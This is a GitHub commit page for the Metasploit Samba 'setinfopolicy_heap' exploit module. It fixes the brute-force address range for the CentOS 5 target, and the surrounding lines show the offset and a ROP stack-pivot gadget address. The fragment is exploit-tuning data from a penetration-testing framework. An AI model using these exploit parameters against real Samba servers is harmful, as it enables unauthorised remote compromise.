Skip to content

Commit e170c1e

Browse files
author
m m
committed
typo in centos5 range
1 parent f7481b1 commit e170c1e

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/linux/samba/setinfopolicy_heap.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -138,8 +138,8 @@ def initialize(info = {})
138138
'Offset' => 0x11c0,
139139
'Ropname' => '3.5.10-0.107.el5 on CentOS 5',
140140
'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2
141-
'Start' => 0xb6962000 ,
142-
'Stop' => 0xb6a61000 ,
141+
'Start' => 0x0037c000 ,
142+
'Stop' => 0x09e73000 ,
143143
'Step' => 0x1000,
144144
}
145145
]

0 commit comments

Comments
 (0)